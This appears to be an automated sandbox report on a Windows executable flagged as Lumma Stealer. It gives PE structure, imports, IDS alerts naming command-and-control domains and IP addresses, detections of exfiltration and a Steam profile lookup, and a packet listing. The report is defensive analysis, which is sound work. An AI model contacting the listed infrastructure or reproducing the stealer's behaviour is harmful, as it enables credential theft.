ret
push esi
call 00007F06C53227D1h
test eax, eax
je 00007F06C5321682h
mov eax, dword ptr fs:[00000018h]
mov esi, 004F126Ch
mov edx, dword ptr [eax+04h]
jmp 00007F06C5321666h
cmp edx, eax
je 00007F06C5321672h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F06C5321652h
xor al, al
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x99590	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf3000	0x595	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf4000	0x4a6c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92ed8	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x92e18	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x89000	0x168	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x87979	0x87a00	044650b58ccfdf22d59688975eb28619	False	0.4159634216589862	data	6.712709465131409	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x89000	0x10dbc	0x10e00	44dd3c2c6d8dd6561feff513b717f332	False	0.37484085648148147	data	4.730347633806706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9a000	0x5860c	0x57000	97e8befe544146c28bc1d02e8abb05b4	False	0.9839512616738506	DOS executable (character device driver \377\3,close media-support)	7.9892117297375185	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf3000	0x595	0x600	365e5a183cc437b4e69a5f5af50b49a4	False	0.4420572916666667	data	3.9804071365027434	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf4000	0x4a6c	0x4c00	7ef93dc09581a5cbc30575644ec3e831	False	0.7351973684210527	data	6.5995949755223915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xf30a0	0x378	data	English	United States	0.46283783783783783
RT_MANIFEST	0xf3418	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

WaitForSingleObject, CloseHandle, CreateThread, MultiByteToWideChar, FormatMessageA, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LocalFree, GetLocaleInfoEx, LCMapStringEx, CompareStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetCurrentThread, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, SetConsoleCtrlHandler, HeapReAlloc, GetTimeZoneInformation, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-13T01:33:02.874735+0200	2056570	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)	1	192.168.2.4	53019	1.1.1.1	53	UDP
2024-10-13T01:33:03.425249+0200	2056571	ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)	1	192.168.2.4	49730	188.114.97.3	443	TCP
2024-10-13T01:33:03.983950+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	188.114.97.3	443	TCP
2024-10-13T01:33:03.983950+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	188.114.97.3	443	TCP
2024-10-13T01:33:03.992000+0200	2056568	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)	1	192.168.2.4	50815	1.1.1.1	53	UDP
2024-10-13T01:33:04.003296+0200	2056566	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)	1	192.168.2.4	62379	1.1.1.1	53	UDP
2024-10-13T01:33:04.533176+0200	2056567	ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)	1	192.168.2.4	49731	104.21.33.249	443	TCP
2024-10-13T01:33:04.958200+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	104.21.33.249	443	TCP
2024-10-13T01:33:04.958200+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.33.249	443	TCP
2024-10-13T01:33:04.960091+0200	2056564	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)	1	192.168.2.4	51372	1.1.1.1	53	UDP
2024-10-13T01:33:05.454400+0200	2056565	ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)	1	192.168.2.4	49732	104.21.77.78	443	TCP
2024-10-13T01:33:05.919658+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49732	104.21.77.78	443	TCP
2024-10-13T01:33:05.919658+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.77.78	443	TCP
2024-10-13T01:33:05.997096+0200	2056562	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)	1	192.168.2.4	63554	1.1.1.1	53	UDP
2024-10-13T01:33:06.495424+0200	2056563	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)	1	192.168.2.4	49733	172.67.140.193	443	TCP
2024-10-13T01:33:06.958459+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49733	172.67.140.193	443	TCP
2024-10-13T01:33:06.958459+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49733	172.67.140.193	443	TCP
2024-10-13T01:33:06.978222+0200	2056560	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)	1	192.168.2.4	59870	1.1.1.1	53	UDP
2024-10-13T01:33:07.468196+0200	2056561	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)	1	192.168.2.4	49734	104.21.30.221	443	TCP
2024-10-13T01:33:07.874188+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49734	104.21.30.221	443	TCP
2024-10-13T01:33:07.874188+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49734	104.21.30.221	443	TCP
2024-10-13T01:33:07.876071+0200	2056558	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)	1	192.168.2.4	53173	1.1.1.1	53	UDP
2024-10-13T01:33:08.373257+0200	2056559	ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)	1	192.168.2.4	49735	172.67.141.136	443	TCP
2024-10-13T01:33:08.805235+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49735	172.67.141.136	443	TCP
2024-10-13T01:33:08.805235+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49735	172.67.141.136	443	TCP
2024-10-13T01:33:08.828087+0200	2056556	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)	1	192.168.2.4	49523	1.1.1.1	53	UDP
2024-10-13T01:33:09.322760+0200	2056557	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)	1	192.168.2.4	49736	188.114.96.3	443	TCP
2024-10-13T01:33:09.810160+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49736	188.114.96.3	443	TCP
2024-10-13T01:33:09.810160+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	188.114.96.3	443	TCP
2024-10-13T01:33:11.056455+0200	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49737	104.102.49.254	443	TCP
2024-10-13T01:33:12.050230+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49738	104.21.53.8	443	TCP
2024-10-13T01:33:12.050230+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	104.21.53.8	443	TCP
2024-10-13T01:33:12.782217+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49739	104.21.53.8	443	TCP
2024-10-13T01:33:12.782217+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49739	104.21.53.8	443	TCP
2024-10-13T01:33:13.489352+0200	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49740	104.21.53.8	443	TCP
2024-10-13T01:33:14.848711+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49742	104.21.53.8	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 01:33:02.898209095 CEST	49730	443	192.168.2.4	188.114.97.3
Oct 13, 2024 01:33:02.898325920 CEST	443	49730	188.114.97.3	192.168.2.4
Oct 13, 2024 01:33:02.898406029 CEST	49730	443	192.168.2.4	188.114.97.3
Oct 13, 2024 01:33:02.914834023 CEST	49730	443	192.168.2.4	188.114.97.3
Oct 13, 2024 01:33:02.914874077 CEST	443	49730	188.114.97.3	192.168.2.4
Oct 13, 2024 01:33:03.425038099 CEST	443	49730	188.114.97.3	192.168.2.4
Oct 13, 2024 01:33:03.425249100 CEST	49730	443	192.168.2.4	188.114.97.3
Oct 13, 2024 01:33:03.468766928 CEST	49730	443	192.168.2.4	188.114.97.3
Oct 13, 2024 01:33:03.468837976 CEST	443	49730	188.114.97.3	192.168.2.4
Oct 13, 2024 01:33:03.469917059 CEST	443	49730	188.114.97.3	192.168.2.4
Oct 13, 2024 01:33:03.518043995 CEST	49730	443	192.168.2.4	188.114.97.3
Oct 13, 2024 01:33:03.529606104 CEST	49730	443	192.168.2.4	188.114.97.3
Oct 13, 2024 01:33:03.529606104 CEST	49730	443	192.168.2.4	188.114.97.3
Oct 13, 2024 01:33:03.529774904 CEST	443	49730	188.114.97.3	192.168.2.4
Oct 13, 2024 01:33:03.984038115 CEST	443	49730	188.114.97.3	192.168.2.4
Oct 13, 2024 01:33:03.984282017 CEST	443	49730	188.114.97.3	192.168.2.4
Oct 13, 2024 01:33:03.984481096 CEST	49730	443	192.168.2.4	188.114.97.3
Oct 13, 2024 01:33:03.986565113 CEST	49730	443	192.168.2.4	188.114.97.3
Oct 13, 2024 01:33:03.986565113 CEST	49730	443	192.168.2.4	188.114.97.3
Oct 13, 2024 01:33:03.986589909 CEST	443	49730	188.114.97.3	192.168.2.4
Oct 13, 2024 01:33:03.986602068 CEST	443	49730	188.114.97.3	192.168.2.4
Oct 13, 2024 01:33:04.016892910 CEST	49731	443	192.168.2.4	104.21.33.249
Oct 13, 2024 01:33:04.016932011 CEST	443	49731	104.21.33.249	192.168.2.4
Oct 13, 2024 01:33:04.017215967 CEST	49731	443	192.168.2.4	104.21.33.249
Oct 13, 2024 01:33:04.017352104 CEST	49731	443	192.168.2.4	104.21.33.249
Oct 13, 2024 01:33:04.017358065 CEST	443	49731	104.21.33.249	192.168.2.4
Oct 13, 2024 01:33:04.532840014 CEST	443	49731	104.21.33.249	192.168.2.4
Oct 13, 2024 01:33:04.533175945 CEST	49731	443	192.168.2.4	104.21.33.249
Oct 13, 2024 01:33:04.536340952 CEST	49731	443	192.168.2.4	104.21.33.249
Oct 13, 2024 01:33:04.536370993 CEST	443	49731	104.21.33.249	192.168.2.4
Oct 13, 2024 01:33:04.536886930 CEST	443	49731	104.21.33.249	192.168.2.4
Oct 13, 2024 01:33:04.538050890 CEST	49731	443	192.168.2.4	104.21.33.249
Oct 13, 2024 01:33:04.538093090 CEST	49731	443	192.168.2.4	104.21.33.249
Oct 13, 2024 01:33:04.538157940 CEST	443	49731	104.21.33.249	192.168.2.4
Oct 13, 2024 01:33:04.958268881 CEST	443	49731	104.21.33.249	192.168.2.4
Oct 13, 2024 01:33:04.958506107 CEST	443	49731	104.21.33.249	192.168.2.4
Oct 13, 2024 01:33:04.958745003 CEST	49731	443	192.168.2.4	104.21.33.249
Oct 13, 2024 01:33:04.958745003 CEST	49731	443	192.168.2.4	104.21.33.249
Oct 13, 2024 01:33:04.958745003 CEST	49731	443	192.168.2.4	104.21.33.249
Oct 13, 2024 01:33:04.975817919 CEST	49732	443	192.168.2.4	104.21.77.78
Oct 13, 2024 01:33:04.975912094 CEST	443	49732	104.21.77.78	192.168.2.4
Oct 13, 2024 01:33:04.976011992 CEST	49732	443	192.168.2.4	104.21.77.78
Oct 13, 2024 01:33:04.976260900 CEST	49732	443	192.168.2.4	104.21.77.78
Oct 13, 2024 01:33:04.976295948 CEST	443	49732	104.21.77.78	192.168.2.4
Oct 13, 2024 01:33:05.268074989 CEST	49731	443	192.168.2.4	104.21.33.249
Oct 13, 2024 01:33:05.268147945 CEST	443	49731	104.21.33.249	192.168.2.4
Oct 13, 2024 01:33:05.454282999 CEST	443	49732	104.21.77.78	192.168.2.4
Oct 13, 2024 01:33:05.454400063 CEST	49732	443	192.168.2.4	104.21.77.78
Oct 13, 2024 01:33:05.456048965 CEST	49732	443	192.168.2.4	104.21.77.78
Oct 13, 2024 01:33:05.456065893 CEST	443	49732	104.21.77.78	192.168.2.4
Oct 13, 2024 01:33:05.456417084 CEST	443	49732	104.21.77.78	192.168.2.4
Oct 13, 2024 01:33:05.457530022 CEST	49732	443	192.168.2.4	104.21.77.78
Oct 13, 2024 01:33:05.457557917 CEST	49732	443	192.168.2.4	104.21.77.78
Oct 13, 2024 01:33:05.457617044 CEST	443	49732	104.21.77.78	192.168.2.4
Oct 13, 2024 01:33:05.919657946 CEST	443	49732	104.21.77.78	192.168.2.4
Oct 13, 2024 01:33:05.919786930 CEST	443	49732	104.21.77.78	192.168.2.4
Oct 13, 2024 01:33:05.919929028 CEST	49732	443	192.168.2.4	104.21.77.78
Oct 13, 2024 01:33:05.921343088 CEST	49732	443	192.168.2.4	104.21.77.78
Oct 13, 2024 01:33:05.921343088 CEST	49732	443	192.168.2.4	104.21.77.78
Oct 13, 2024 01:33:05.921375036 CEST	443	49732	104.21.77.78	192.168.2.4
Oct 13, 2024 01:33:05.921390057 CEST	443	49732	104.21.77.78	192.168.2.4
Oct 13, 2024 01:33:06.010768890 CEST	49733	443	192.168.2.4	172.67.140.193
Oct 13, 2024 01:33:06.010879040 CEST	443	49733	172.67.140.193	192.168.2.4
Oct 13, 2024 01:33:06.011044025 CEST	49733	443	192.168.2.4	172.67.140.193
Oct 13, 2024 01:33:06.011270046 CEST	49733	443	192.168.2.4	172.67.140.193
Oct 13, 2024 01:33:06.011296034 CEST	443	49733	172.67.140.193	192.168.2.4
Oct 13, 2024 01:33:06.495321989 CEST	443	49733	172.67.140.193	192.168.2.4
Oct 13, 2024 01:33:06.495424032 CEST	49733	443	192.168.2.4	172.67.140.193
Oct 13, 2024 01:33:06.496999979 CEST	49733	443	192.168.2.4	172.67.140.193
Oct 13, 2024 01:33:06.497028112 CEST	443	49733	172.67.140.193	192.168.2.4
Oct 13, 2024 01:33:06.497517109 CEST	443	49733	172.67.140.193	192.168.2.4
Oct 13, 2024 01:33:06.498650074 CEST	49733	443	192.168.2.4	172.67.140.193
Oct 13, 2024 01:33:06.498676062 CEST	49733	443	192.168.2.4	172.67.140.193
Oct 13, 2024 01:33:06.498794079 CEST	443	49733	172.67.140.193	192.168.2.4
Oct 13, 2024 01:33:06.958446026 CEST	443	49733	172.67.140.193	192.168.2.4
Oct 13, 2024 01:33:06.958555937 CEST	443	49733	172.67.140.193	192.168.2.4
Oct 13, 2024 01:33:06.958647013 CEST	49733	443	192.168.2.4	172.67.140.193
Oct 13, 2024 01:33:06.958889008 CEST	49733	443	192.168.2.4	172.67.140.193
Oct 13, 2024 01:33:06.958889008 CEST	49733	443	192.168.2.4	172.67.140.193
Oct 13, 2024 01:33:06.958919048 CEST	443	49733	172.67.140.193	192.168.2.4
Oct 13, 2024 01:33:06.958931923 CEST	443	49733	172.67.140.193	192.168.2.4
Oct 13, 2024 01:33:06.992443085 CEST	49734	443	192.168.2.4	104.21.30.221
Oct 13, 2024 01:33:06.992516994 CEST	443	49734	104.21.30.221	192.168.2.4
Oct 13, 2024 01:33:06.992719889 CEST	49734	443	192.168.2.4	104.21.30.221
Oct 13, 2024 01:33:06.993027925 CEST	49734	443	192.168.2.4	104.21.30.221
Oct 13, 2024 01:33:06.993043900 CEST	443	49734	104.21.30.221	192.168.2.4
Oct 13, 2024 01:33:07.467959881 CEST	443	49734	104.21.30.221	192.168.2.4
Oct 13, 2024 01:33:07.468195915 CEST	49734	443	192.168.2.4	104.21.30.221
Oct 13, 2024 01:33:07.469702959 CEST	49734	443	192.168.2.4	104.21.30.221
Oct 13, 2024 01:33:07.469736099 CEST	443	49734	104.21.30.221	192.168.2.4
Oct 13, 2024 01:33:07.470124960 CEST	443	49734	104.21.30.221	192.168.2.4
Oct 13, 2024 01:33:07.471482992 CEST	49734	443	192.168.2.4	104.21.30.221
Oct 13, 2024 01:33:07.471482992 CEST	49734	443	192.168.2.4	104.21.30.221
Oct 13, 2024 01:33:07.471587896 CEST	443	49734	104.21.30.221	192.168.2.4
Oct 13, 2024 01:33:07.874172926 CEST	443	49734	104.21.30.221	192.168.2.4
Oct 13, 2024 01:33:07.874289036 CEST	443	49734	104.21.30.221	192.168.2.4
Oct 13, 2024 01:33:07.874361038 CEST	49734	443	192.168.2.4	104.21.30.221
Oct 13, 2024 01:33:07.874470949 CEST	49734	443	192.168.2.4	104.21.30.221
Oct 13, 2024 01:33:07.874521971 CEST	443	49734	104.21.30.221	192.168.2.4
Oct 13, 2024 01:33:07.874561071 CEST	49734	443	192.168.2.4	104.21.30.221
Oct 13, 2024 01:33:07.874578953 CEST	443	49734	104.21.30.221	192.168.2.4
Oct 13, 2024 01:33:07.889633894 CEST	49735	443	192.168.2.4	172.67.141.136
Oct 13, 2024 01:33:07.889744043 CEST	443	49735	172.67.141.136	192.168.2.4
Oct 13, 2024 01:33:07.889826059 CEST	49735	443	192.168.2.4	172.67.141.136
Oct 13, 2024 01:33:07.890095949 CEST	49735	443	192.168.2.4	172.67.141.136
Oct 13, 2024 01:33:07.890134096 CEST	443	49735	172.67.141.136	192.168.2.4
Oct 13, 2024 01:33:08.373121023 CEST	443	49735	172.67.141.136	192.168.2.4
Oct 13, 2024 01:33:08.373256922 CEST	49735	443	192.168.2.4	172.67.141.136
Oct 13, 2024 01:33:08.374672890 CEST	49735	443	192.168.2.4	172.67.141.136
Oct 13, 2024 01:33:08.374710083 CEST	443	49735	172.67.141.136	192.168.2.4
Oct 13, 2024 01:33:08.375246048 CEST	443	49735	172.67.141.136	192.168.2.4
Oct 13, 2024 01:33:08.376225948 CEST	49735	443	192.168.2.4	172.67.141.136
Oct 13, 2024 01:33:08.376225948 CEST	49735	443	192.168.2.4	172.67.141.136
Oct 13, 2024 01:33:08.376329899 CEST	443	49735	172.67.141.136	192.168.2.4
Oct 13, 2024 01:33:08.805198908 CEST	443	49735	172.67.141.136	192.168.2.4
Oct 13, 2024 01:33:08.805306911 CEST	443	49735	172.67.141.136	192.168.2.4
Oct 13, 2024 01:33:08.805388927 CEST	49735	443	192.168.2.4	172.67.141.136
Oct 13, 2024 01:33:08.809782982 CEST	49735	443	192.168.2.4	172.67.141.136
Oct 13, 2024 01:33:08.809832096 CEST	443	49735	172.67.141.136	192.168.2.4
Oct 13, 2024 01:33:08.809861898 CEST	49735	443	192.168.2.4	172.67.141.136
Oct 13, 2024 01:33:08.809878111 CEST	443	49735	172.67.141.136	192.168.2.4
Oct 13, 2024 01:33:08.843260050 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 13, 2024 01:33:08.843305111 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 13, 2024 01:33:08.843379974 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 13, 2024 01:33:08.843653917 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 13, 2024 01:33:08.843668938 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 13, 2024 01:33:09.322592974 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 13, 2024 01:33:09.322760105 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 13, 2024 01:33:09.324304104 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 13, 2024 01:33:09.324320078 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 13, 2024 01:33:09.324666023 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 13, 2024 01:33:09.325884104 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 13, 2024 01:33:09.325905085 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 13, 2024 01:33:09.326149940 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 13, 2024 01:33:09.810173988 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 13, 2024 01:33:09.810267925 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 13, 2024 01:33:09.810333967 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 13, 2024 01:33:09.810612917 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 13, 2024 01:33:09.810633898 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 13, 2024 01:33:09.810672045 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 13, 2024 01:33:09.810678959 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 13, 2024 01:33:09.820010900 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:09.820064068 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:09.820159912 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:09.820619106 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:09.820632935 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:10.532525063 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:10.532818079 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:10.534977913 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:10.534991026 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:10.535404921 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:10.537153959 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:10.583404064 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.056526899 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.056588888 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.056649923 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.056670904 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:11.056710958 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.056745052 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:11.056792021 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:11.186764956 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.186821938 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.186849117 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:11.186888933 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.186909914 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:11.186932087 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:11.193567991 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.193624020 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:11.193667889 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.193713903 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:11.193722963 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.193852901 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.193897963 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:11.195074081 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:11.195097923 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.195111990 CEST	49737	443	192.168.2.4	104.102.49.254
Oct 13, 2024 01:33:11.195118904 CEST	443	49737	104.102.49.254	192.168.2.4
Oct 13, 2024 01:33:11.406673908 CEST	49738	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:11.406723976 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:11.406831980 CEST	49738	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:11.407219887 CEST	49738	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:11.407242060 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:11.932823896 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:11.932995081 CEST	49738	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:11.935507059 CEST	49738	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:11.935523033 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:11.936114073 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:11.937706947 CEST	49738	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:11.937742949 CEST	49738	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:11.937859058 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.050216913 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.050278902 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.050415039 CEST	49738	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.050482988 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.050688982 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.050765038 CEST	49738	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.050781012 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.050803900 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.050889969 CEST	49738	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.050985098 CEST	49738	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.051019907 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.051045895 CEST	49738	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.051059008 CEST	443	49738	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.160037994 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.160120010 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.160227060 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.160656929 CEST	49739	443	192.168.2.4	104.21.53.8
